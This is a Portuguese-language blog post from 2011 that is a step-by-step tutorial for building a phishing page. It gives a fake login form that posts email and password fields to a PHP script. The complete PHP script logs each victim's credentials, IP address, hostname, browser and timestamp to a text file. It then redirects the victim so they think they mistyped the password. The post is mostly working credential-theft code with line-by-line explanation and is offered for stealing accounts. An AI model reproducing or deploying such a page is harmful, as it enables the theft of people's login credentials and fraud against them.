sábado, 2 de abril de 2011

Pagina Faker
Criando Pagina Fake

A pagina fake como todos sabem é um clone da pagina original, mas só que invés de logar no site, ele envia as informações pra outro arquivo que no caso seria em php e o cara rouba ou sei la o que faz com a conta, mais enfim, vou mostrar como seria:

<html>
<form action="salva.php" method="POST">
Login:<input type="text" name="Email"><bR>
Senha:<input type="password" name="Passwd"><br>
</form>
</html>

Vou explicando por linhas

1. Incia-se o html

2. Abre o form, action serve para enviar as informações para a pagina indicada e method que no caso seria o metodo usado, ali eu uso o metodo POST.

3. Login, ai vem o input que é a caixa de texto e "type" que seria "tipo" é o tipo de coisa que vai aparece na caixa, ali no caso vai aparecer o texto normalmente e o id serve para nomear a informação levada ao "Salva.php".

4. Senha, e a caixa para escrever a senha, ali o "tipo" é password ou seja vai aparecer akelas bolinhas ao envez de texto e ai ali o id é o "Passwd".

5. Fecha o form ou seja, qualquer input abaixo naum vai ser mais enviado para o salva.php, só se vc criar outro form.

6. Fecha o html.

7. Agora crie um arquivo PHP com este codigo:

<?php
$nomearquivo ="senhas.txt";
$email =$_POST["Email"];
$senha =$_POST["Passwd"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$ip =$_SERVER['REMOTE_ADDR'];
$hostname =gethostbyaddr($ip);
$data =date("Y-m-d");
$hora =date("H:i:s");
$traco ="<br>__________________________________________________________________<br>";
$ess ="Email: ".$email."<br>Senha: ".$senha."<br>Navegador: ".$browser."<br>IP: ".$ip."<br>Nome do Host: ".$hostname."<br>Data: ".$data."<br>Hora: ".$hora."<br>".$traco;
$abre = @fopen("senhas.txt","a+");
$escreve = fwrite($abre, $ess);
echo "<script>javascript:document.location='www.google.com.br'</script>";
?>

Esse é o Salva.php.
Vou explicar que neen ontem, por linhas
1. Se inicia o php
2. Variavel do nome do arquivo de texto
3. Variavel Setando valor recebido pelo form que seria da caixa que tinha o name="Email"
4. Mesmo caso acima, só que agora é recebido pela caixa com o name="Passwd"
5. Variavel setando o nome do browser que o cara está usando
6. mesmo caso acima, só que pegando o ip
7. Esse puxa o nome do host
8. Setando data na variavel
9. Setando Horario na variavel
10. Setando um monte de underline :D
11. Setando na variavel tudo que vai ser escrito no bloco de notas
12. Setando o comando fopen dentro da variavel
13. Executa o Comando fwrite, ali ele escolhe onde vai escrever e como($abre), e depois oq vai escrever($ess)
14. Executa um javascript, para enviar você para outra pagina, que no caso iriam usar para encaminhar para a pagina original, fazendo com que a vitima pensasse que colocou a senha errada.




 


0 comentários:

Postar um comentário